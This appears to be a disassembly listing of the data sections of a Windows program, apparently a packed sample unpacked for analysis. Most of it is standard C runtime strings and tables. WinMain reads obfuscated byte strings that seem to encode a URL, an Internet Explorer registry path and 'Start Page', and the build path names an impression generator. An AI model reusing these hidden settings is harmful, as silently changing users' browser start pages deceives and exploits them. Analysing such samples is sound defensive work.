dd 2, 58h, 7150h, 6350h, 0
stru_406120 _msEH <0FFFFFFFFh, offset loc_401344, offset loc_401358>
; DATA XREF: start+2�o
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: unknown_libname_1+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: unknown_libname_1�o
stru_406148 _msEH <0FFFFFFFFh, 0, offset loc_4014EC> ; DATA XREF: _doexit+2�o
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 4
aR6029ThisAppli db 'R6029',0Dh,0Ah
db '- This application cannot run using the active version of the Mic'
db 'rosoft .NET Runtime',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_40809C�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+123�o
; ___security_error_handler+132�o
align 10h
; char asc_406520[]
asc_406520 db 0Ah ; DATA XREF: __NMSG_WRITE+107�o
; ___security_error_handler+FC�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+F5�o
db 0Ah
db 'Program: ',0
align 10h
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+C1�o
; ___security_error_handler+CC�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+8E�o
; ___security_error_handler+8B�o
byte_40655B db 0 ; DATA XREF: __wincmdln+1B�o
align 10h
stru_406560 _msEH <0FFFFFFFFh, offset loc_401ED8, offset loc_401EDC>
; DATA XREF: sub_401EAB+2�o
align 10h
stru_406570 _msEH <0FFFFFFFFh, offset loc_401F1C, offset loc_401F20>
; DATA XREF: sub_401EEF+2�o
align 10h
stru_406580 _msEH <0FFFFFFFFh, 0, offset sub_4020F7> ; DATA XREF: _freefls(x)+2�o
dd 0FFFFFFFFh, 0
dd offset sub_402105
aFlsfree db 'FlsFree',0 ; DATA XREF: __mtinit+4C�o
aFlssetvalue db 'FlsSetValue',0 ; DATA XREF: __mtinit+3F�o
aFlsgetvalue db 'FlsGetValue',0 ; DATA XREF: __mtinit+32�o
aFlsalloc db 'FlsAlloc',0 ; DATA XREF: __mtinit+2A�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: __mtinit+13�o
; ___crtInitCritSecAndSpinCount+1E�o
align 8
stru_4065D8 _msEH <0FFFFFFFFh, 0, offset sub_402557> ; DATA XREF: __mtinitlocknum+2�o
align 8
stru_4065E8 _msEH <0FFFFFFFFh, 0, offset sub_40266B> ; DATA XREF: __onexit+2�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: ___crtMessageBoxA+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: ___crtMessageBoxA+62�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+47�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+2E�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+13�o
align 8
stru_406668 _msEH <0FFFFFFFFh, offset sub_402A58, offset sub_402A5C>
; DATA XREF: sub_402A6C-2F�o
align 8
stru_406678 _msEH <0FFFFFFFFh, 0, offset sub_402F79> ; DATA XREF: __setmbcp+2�o
align 8
stru_406688 _msEH <0FFFFFFFFh, 0, offset sub_402FF3> ; DATA XREF: _free+2�o
align 8
stru_406698 _msEH <0FFFFFFFFh, 0, offset sub_403080> ; DATA XREF: __heap_alloc+2�o
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0
; DATA XREF: ___crtInitCritSecAndSpinCount+2D�o
align 10h
stru_4066D0 _msEH <0FFFFFFFFh, offset loc_40347A, offset loc_403488>
; DATA XREF: ___crtInitCritSecAndSpinCount+2�o
align 10h
stru_4066E0 _msEH <0FFFFFFFFh, 0, offset sub_40354F> ; DATA XREF: _calloc+2�o
align 10h
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 20h, 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h, 7F7E7Dh
stru_406870 _msEH <0FFFFFFFFh, 0, offset sub_403726> ; DATA XREF: ___updatetlocinfo+2�o
align 10h
stru_406880 _msEH <0FFFFFFFFh, 0, offset sub_4046D4> ; DATA XREF: _realloc+2�o
align 10h
stru_406890 _msEH <0FFFFFFFFh, 0, offset sub_40478B> ; DATA XREF: __msize+2�o
; char aProgram[]
aProgram db 'Program: ',0 ; DATA XREF: ___security_error_handler+108�o
align 4
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: ___security_error_handler+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0
; DATA XREF: ___security_error_handler:loc_40485A�o
align 8
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: ___security_error_handler+4C�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
; char aUnknownSecurit[]
aUnknownSecurit db 'Unknown security failure detected!',0
; DATA XREF: ___security_error_handler+47�o
align 10h
stru_406A40 _msEH <0FFFFFFFFh, offset loc_404835, offset loc_404839>
; DATA XREF: ___security_error_handler+5�o
dd 41h dup(0)
asc_406B50: ; DATA XREF: .data:00408460�o
; .data:off_408720�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
dword_406D50 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: .data:00408724�o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
dword_406F54 dd 0 ; DATA XREF: ___crtLCMapStringA+1C�o
; ___crtGetStringTypeA+1E�o
stru_406F58 _msEH <0FFFFFFFFh, offset loc_404C3E, offset loc_404C42>
; DATA XREF: ___crtLCMapStringA+2�o
dd 0FFFFFFFFh, 404A3Bh, 404A3Fh, 0FFFFFFFFh, 404B09h, 404B0Dh
dd 0
stru_406F80 _msEH <0FFFFFFFFh, offset loc_404DDA, offset loc_404DDE>
; DATA XREF: ___crtGetStringTypeA+2�o
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: .data:004087D8�o
align 4
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .data:004087D4�o
aMmDdYy db 'MM/dd/yy',0 ; DATA XREF: .data:004087D0�o
align 4
aPm db 'PM',0 ; DATA XREF: .data:004087CC�o
align 4
aAm db 'AM',0 ; DATA XREF: .data:004087C8�o
align 10h
aDecember db 'December',0 ; DATA XREF: .data:004087C4�o
align 4
aNovember db 'November',0 ; DATA XREF: .data:004087C0�o
align 4
aOctober db 'October',0 ; DATA XREF: .data:004087BC�o
aSeptember db 'September',0 ; DATA XREF: .data:004087B8�o
align 4
aAugust db 'August',0 ; DATA XREF: .data:004087B4�o
align 4
aJuly db 'July',0 ; DATA XREF: .data:004087B0�o
align 4
aJune db 'June',0 ; DATA XREF: .data:004087AC�o
align 4
aApril db 'April',0 ; DATA XREF: .data:004087A4�o
align 4
aMarch db 'March',0 ; DATA XREF: .data:004087A0�o
align 4
aFebruary db 'February',0 ; DATA XREF: .data:0040879C�o
align 10h
aJanuary db 'January',0 ; DATA XREF: .data:00408798�o
aDec db 'Dec',0 ; DATA XREF: .data:00408794�o
aNov db 'Nov',0 ; DATA XREF: .data:00408790�o
aOct db 'Oct',0 ; DATA XREF: .data:0040878C�o
aSep db 'Sep',0 ; DATA XREF: .data:00408788�o
aAug db 'Aug',0 ; DATA XREF: .data:00408784�o
aJul db 'Jul',0 ; DATA XREF: .data:00408780�o
aJun db 'Jun',0 ; DATA XREF: .data:0040877C�o
aMay db 'May',0 ; DATA XREF: .data:00408778�o
; .data:004087A8�o
aApr db 'Apr',0 ; DATA XREF: .data:00408774�o
aMar db 'Mar',0 ; DATA XREF: .data:00408770�o
aFeb db 'Feb',0 ; DATA XREF: .data:0040876C�o
aJan db 'Jan',0 ; DATA XREF: .data:00408768�o
aSaturday db 'Saturday',0 ; DATA XREF: .data:00408764�o
align 4
aFriday db 'Friday',0 ; DATA XREF: .data:00408760�o
align 4
aThursday db 'Thursday',0 ; DATA XREF: .data:0040875C�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: .data:00408758�o
align 4
aTuesday db 'Tuesday',0 ; DATA XREF: .data:00408754�o
aMonday db 'Monday',0 ; DATA XREF: .data:00408750�o
align 4
aSunday db 'Sunday',0 ; DATA XREF: .data:0040874C�o
align 4
aSat db 'Sat',0 ; DATA XREF: .data:00408748�o
aFri db 'Fri',0 ; DATA XREF: .data:00408744�o
aThu db 'Thu',0 ; DATA XREF: .data:00408740�o
aWed db 'Wed',0 ; DATA XREF: .data:0040873C�o
aTue db 'Tue',0 ; DATA XREF: .data:00408738�o
aMon db 'Mon',0 ; DATA XREF: .data:00408734�o
aSun db 'Sun',0 ; DATA XREF: .data:off_408730�o
stru_4070B8 _msEH <0FFFFFFFFh, offset loc_405812, offset loc_405816>
; DATA XREF: ___convertcp+2�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 8
dd 48h, 0Eh dup(0)
dd offset dword_408310
dd offset asc_4071B0 ; "\""
dd 2, 53445352h, 4AD5E55Fh, 4677CF03h, 0FFD610BEh, 0FA0AB8C8h
dd 1
aPProjectsKlikt db 'p:\Projects\Kliktanje\gen_impression\Release\gen_impression.pdb',0
align 10h
asc_4071B0 db '"',0 ; DATA XREF: .rdata:00407148�o
align 4
aTb db 'tB',0
align 4
dd 0
dword_4071BC dd 2 dup(0) ; DATA XREF: sub_401EAB+C�o
; sub_401EAB:loc_401EBE�o
dword_4071C4 dd 0 ; DATA XREF: sub_401EEF+C�o
; sub_401EEF:loc_401F02�o
dd 7210h, 2 dup(0)
dd 7330h, 600Ch, 7204h, 2 dup(0)
dd 7360h, 6000h, 5 dup(0)
dd 7350h, 733Eh, 0
dd 7324h, 730Eh, 7300h, 736Eh, 7382h, 7394h, 73A6h, 73B6h
dd 73C4h, 73D6h, 73EAh, 73FEh, 740Ah, 741Ah, 7436h, 7450h
dd 7468h, 7482h, 7498h, 74A8h, 74C2h, 74D4h, 74E2h, 74FAh
dd 7506h, 7516h, 752Ch, 7536h, 7544h, 7552h, 7560h, 756Eh
dd 757Ch, 7588h, 75A0h, 75B8h, 75C8h, 75D2h, 75DEh, 75EAh
dd 75F6h, 7612h, 7622h, 7630h, 763Ch, 7652h, 7662h, 766Eh
dd 7688h, 7698h, 76AEh, 76C8h, 76D8h, 76EEh, 76FEh, 7710h
dd 7722h, 7734h, 7746h, 0
dd 6F4D0265h, 69466576h, 7845656Ch, 1750041h
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
dd 736C03BCh, 656C7274h, 416Eh, 4E52454Bh, 32334C45h, 6C6C642Eh
dd 1F90000h, 53676552h, 61567465h, 4565756Ch, 4178h, 655201CCh
dd 65724367h, 4B657461h, 417965h, 41564441h, 32334950h
dd 6C6C642Eh, 1770000h, 4D746547h, 6C75646Fh, 6E614865h
dd 41656C64h, 1AF0000h, 53746547h, 74726174h, 6E497075h
dd 416F66h, 65470108h, 6D6F4374h, 646E616Dh, 656E694Ch
dd 1DF0041h, 56746547h, 69737265h, 78456E6Fh, 0AF0041h
dd 74697845h, 636F7250h, 737365h, 65470198h, 6F725074h
dd 64644163h, 73736572h, 34F0000h, 6D726554h, 74616E69h
dd 6F725065h, 73736563h, 13A0000h
aGetcurrentproc db 'GetCurrentProcess',0
dw 394h
aWritefile db 'WriteFile',0
dw 1B1h
aGetstdhandle db 'GetStdHandle',0
align 2
dw 360h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
aA db '',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
db 4Dh ; M
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStrings',0
aU db '',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 387h
aWidechartomult db 'WideCharToMultiByte',0
db 69h ; i
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 4
db 4Fh ; O
db 1, 47h, 65h
aTenvironment_0 db 'tEnvironmentStringsW',0
align 2
dw 317h
aSethandlecount db 'SetHandleCount',0
align 4
dd 6547015Eh, 6C694674h, 70795465h, 7A0065h
aDeletecritical db 'DeleteCriticalSection',0
dw 354h
aTlsalloc db 'TlsAlloc',0
align 2
dw 31Bh
aSetlasterror db 'SetLastError',0
align 2
dw 13Eh
aGetcurrentthre db 'GetCurrentThreadId',0
align 4
db 55h ; U
db 3, 54h, 6Ch
aSfree db 'sFree',0
dw 357h
aTlssetvalue db 'TlsSetValue',0
db 56h ; V
db 3, 54h, 6Ch
aSgetvalue db 'sGetValue',0
dw 20Ah
aHeapdestroy db 'HeapDestroy',0
db 8
db 2, 48h, 65h
aApcreate db 'apCreate',0
align 2
dw 376h
aVirtualfree db 'VirtualFree',0
db 0Ch
db 2, 48h, 65h
aApfree db 'apFree',0
align 4
db 47h ; G
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 10h
aP db '',0
aEntercriticals db 'EnterCriticalSection',0
align 4
dd 6F4C0248h, 694C6461h, 72617262h, 4179h, 654700F5h, 50434174h
dd 18B0000h, 4F746547h, 50434D45h, 0FC0000h, 43746547h
dd 666E4950h, 206006Fh, 70616548h, 6F6C6C41h, 2190063h
aInitializecr_0 db 'InitializeCriticalSection',0
dw 373h
aVirtualalloc db 'VirtualAlloc',0
align 2
dw 210h
aHeaprealloc db 'HeapReAlloc',0
db 0CAh ;
db 2, 52h, 74h
aLunwind db 'lUnwind',0
db 1Fh
db 2, 49h, 6Eh
aTerlockedexcha db 'terlockedExchange',0
dw 37Bh
aVirtualquery db 'VirtualQuery',0
align 2
dw 212h
aHeapsize db 'HeapSize',0
align 2
dw 297h
aQueryperforman db 'QueryPerformanceCounter',0
db 0D5h ;
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 3Bh ; ;
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcessId',0
dw 1C0h
aGetsystemtimea db 'GetSystemTimeAsFileTime',0
db 3Ah ; :
db 2, 4Ch, 43h
aMapstringa db 'MapStringA',0
align 4
db 6Bh ; k
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 23Bh
aLcmapstringw db 'LCMapStringW',0
align 2
dw 1B2h
aGetstringtypea db 'GetStringTypeA',0
align 10h
dd 654701B5h, 72745374h, 54676E69h, 57657079h, 16C0000h
dd 4C746547h, 6C61636Fh, 666E4965h, 416Fh, 69560379h, 61757472h
dd 6F72506Ch, 74636574h, 1BB0000h, 53746547h, 65747379h
dd 666E496Dh
db 6Fh, 0
_rdata ends
; Section 3. (virtual address 00008000)
; Virtual size : 00001198 ( 4504.)
; Section size in file : 00001198 ( 4504.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 408000h
dword_408000 dd 0 ; DATA XREF: __cinit+45�o
dd offset ___security_init_cookie
dword_408008 dd 0 ; DATA XREF: __cinit+4C�o
dword_40800C dd 0 ; DATA XREF: __cinit+12�o
dd offset ___onexitinit
dd offset ___initmbctable
dword_408018 dd 0 ; DATA XREF: __cinit+17�o
dword_40801C dd 0 ; DATA XREF: _doexit+73�o
dword_408020 dd 0 ; DATA XREF: _doexit:loc_4014B0�o
dword_408024 dd 0 ; DATA XREF: _doexit+83�o
dword_408028 dd 2 dup(0) ; DATA XREF: _doexit:loc_4014C0�o
byte_408030 db 0BBh ; DATA XREF: WinMain(x,x,x,x):loc_40105A�r
db 2 dup(0A7h), 0A3h
dd 0A4FCFCE9h, 0BCFDA4A4h, 0B2BDB6A3h, 0B0BAA7A1h, 0FDA0B6BFh
dd 0BCB5BDBAh, 0
byte_408050 db 80h ; DATA XREF: WinMain(x,x,x,x):loc_40100F�r
db 0BCh, 0B5h, 0A7h
dd 0B6A1B2A4h, 0B0BA9E8Fh, 0BCA0BCA1h, 9A8FA7B5h, 0A1B6A7BDh
dd 0F3A7B6BDh, 0BFA3AB96h, 0A1B6A1BCh, 0BAB29E8Fh, 0BDh
byte_40807C db 80h ; DATA XREF: WinMain(x,x,x,x):loc_401079�r
db 0A7h, 0B2h, 0A1h
dd 0B283F3A7h, 0B6B4h, 2 dup(0)
off_408090 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_408094 dd 2 ; DATA XREF: __NMSG_WRITE+58�r
; __FF_MSGBANNER+E�r
dword_408098 dd 2 ; DATA XREF: __NMSG_WRITE:loc_40156B�r
; __NMSG_WRITE+3A�r
off_40809C dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+D5�r
; __NMSG_WRITE+112�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 4064A4h, 9, 406478h, 0Ah, 4063E0h, 10h, 4063B4h
dd 11h, 406384h, 12h, 406360h, 13h, 406334h, 18h, 4062FCh
dd 19h, 4062D4h, 1Ah, 40629Ch, 1Bh, 406264h, 1Ch, 40623Ch
dd 1Dh, 406198h, 78h, 406188h, 79h, 406178h, 7Ah, 406168h
dd 0FCh, 406164h, 0FFh, 406154h
dword_408130 dd 0C0000005h, 0Bh, 0 ; DATA XREF: __getptd+41�o
; _freefls(x)+70�o ...
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_4081A8 dd 3 ; DATA XREF: __XcptFilter+84�r
; __XcptFilter+A3�r
dword_4081AC dd 7 ; DATA XREF: __XcptFilter+8A�r
; __XcptFilter+A9�r
dd 78h
dword_4081B4 dd 0Ah ; DATA XREF: __XcptFilter+14�r
dd 0FFFFFFFFh, 0A80h, 7 dup(0)
dword_4081DC dd 0 ; DATA XREF: __mtterm�r __mtterm+11�w ...
dd 10h, 3 dup(0)
off_4081F0 dd offset dword_408AD8 ; DATA XREF: __mtinitlocks:loc_40244A�w
; __mtdeletelocks+8�o ...
dword_4081F4 dd 1 ; DATA XREF: __mtinitlocks:loc_402416�r
dd offset dword_408AF0
dd 1, 2 dup(0)
dd offset dword_408B08
dd 1, 408B20h, 1, 2 dup(0)
dd offset dword_408B38
dd 1, 408B50h, 1, 408B68h, 1, 2 dup(0)
dd offset dword_408B80
dd 1, 2 dup(0)
dd offset dword_408B98
dd 1, 408BB0h, 1, 408BC8h, 1, 2 dup(0)
dd offset dword_408BE0
dd 1, 408BF8h, 1, 408C10h, 1, 22h dup(0)
dword_408310 dd 0C4ED31Fh ; DATA XREF: __NMSG_WRITE+E�r
; __mtdeletelocks+2A�o ...
align 8
byte_408318 db 1 ; DATA XREF: __setmbcp_lk+C5�r
db 2, 4, 8
align 10h
dword_408320 dd 3A4h ; DATA XREF: __setmbcp_lk:loc_402CC4�r
dword_408324 dd 82798260h ; DATA XREF: __setmbcp_lk+101�r
dd 21h, 0
dword_408330 dd 0DFA6h ; DATA XREF: __setmbcp_lk+A5�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dd 43h, 0
dword_408418 dd 1, 8 dup(0) ; DATA XREF: _freefls(x)+103�o
; ___updatetlocinfo_lk+AD�o ...
dd 2 dup(1), 3 dup(0)
dd offset off_4087EC
align 10h
dd offset asc_406B50 ; " ((((( H"
dd offset off_408730
dd 0
off_40846C dd offset dword_408418 ; DATA XREF: _freefls(x)+FB�r
; ___updatetlocinfo_lk+B�r ...
dd 0
dd 1, 8 dup(0)
dd 43h, 21h dup(0)
dd 43h, 20h dup(0)
dword_4085A4 dd 19930520h, 4 dup(0) ; DATA XREF: .text:00404323�o
; __NLG_Notify+2�o
dd 1, 16h, 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch
dd 8, 0Ch, 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h
dd 0Fh, 2, 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h
dd 2, 41h, 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h
dd 16h, 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9
dd 6, 16h, 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh
dd 91h, 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
off_408720 dd offset asc_406B50 ; DATA XREF: _x_ismbbtype+18�r
; " ((((( H"
dd offset dword_406D50+2
dd 1, 408730h
off_408730 dd offset aSun ; DATA XREF: .data:00408464�o
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm ; "AM"
dd offset aPm ; "PM"
dd offset aMmDdYy ; "MM/dd/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset aHhMmSs ; "HH:mm:ss"
dd 409h, 1, 0
dword_4087E8 dd 2Eh ; DATA XREF: .data:off_4087EC�o
off_4087EC dd offset dword_4087E8 ; DATA XREF: ___free_lconv_num+15�r
; .data:00408450�o ...
off_4087F0 dd offset dword_408CD0 ; DATA XREF: ___free_lconv_num+32�r
off_4087F4 dd offset dword_408CD0 ; DATA XREF: ___free_lconv_num+4E�r
off_4087F8 dd offset dword_408CD0 ; DATA XREF: ___free_lconv_mon+1B�r
off_4087FC dd offset dword_408CD0 ; DATA XREF: ___free_lconv_mon+38�r
off_408800 dd offset dword_408CD0 ; DATA XREF: ___free_lconv_mon+55�r
off_408804 dd offset dword_408CD0 ; DATA XREF: ___free_lconv_mon+72�r
off_408808 dd offset dword_408CD0 ; DATA XREF: ___free_lconv_mon+8F�r
off_40880C dd offset dword_408CD0 ; DATA XREF: ___free_lconv_mon+AC�r
off_408810 dd offset dword_408CD0 ; DATA XREF: ___free_lconv_mon+C8�r
dd 2 dup(7F7F7F7Fh)
off_40881C dd offset off_4087EC ; DATA XREF: ___free_lconv_num+B�r
; ___free_lconv_num+27�r ...
dd 1, 2Eh, 1, 0
dd 7080h, 1, 0FFFFF1F0h, 0
dword_408840 dd 545350h, 0Fh dup(0) ; DATA XREF: .data:004088C0�o
dword_408880 dd 544450h, 0Fh dup(0) ; DATA XREF: .data:004088C4�o
dd offset dword_408840
dd offset dword_408880
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch, 6 dup(0)
; char *dword_408960
dword_408960 dd 0 ; DATA XREF: start+115�w
; __setenvp:loc_4018C8�r ...
align 8
dword_408968 dd 0 ; DATA XREF: __amsg_exit�r
; _fast_error_exit�r ...
align 10h
dword_408970 dd 2 ; DATA XREF: start+29�w ___heap_select�r ...
dword_408974 dd 0A28h ; DATA XREF: start+49�w start+5A�w
dword_408978 dd 501h ; DATA XREF: start+65�w
dword_40897C dd 5 ; DATA XREF: start+32�w
; ___heap_select+9�r ...
dword_408980 dd 1 ; DATA XREF: start+3A�w
dword_408984 dd 1 ; DATA XREF: __setargv+8F�w
dword_408988 dd 3229A0h ; DATA XREF: __setargv+95�w
align 10h
; void *dword_408990
dword_408990 dd 3229C0h ; DATA XREF: __setenvp+48�w
; __setenvp:loc_401967�r ...
align 10h
off_4089A0 dd offset aCM_unpackerPac ; DATA XREF: __setargv+37�w
; "C:\\m_unpacker\\packed.exe"
align 8
byte_4089A8 db 0 ; DATA XREF: _doexit+3D�w
align 4
dword_4089AC dd 1 ; DATA XREF: _doexit:loc_401476�w
dword_4089B0 dd 1 ; DATA XREF: _doexit+1C�r _doexit+9C�w
dword_4089B4 dd 0 ; DATA XREF: __FF_MSGBANNER+21�r
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: __setargv+1C�o
; .data:off_4089A0�o
align 4
dd 3Ah dup(0)
byte_408ABC db 0 ; DATA XREF: __setargv+23�w
align 10h
dword_408AC0 dd 1 ; DATA XREF: ___crtGetEnvironmentStringsA+2�r
; ___crtGetEnvironmentStringsA+24�w ...
off_408AC4 dd offset sub_401F33 ; DATA XREF: __mtinit+38�w __mtinit+80�w ...
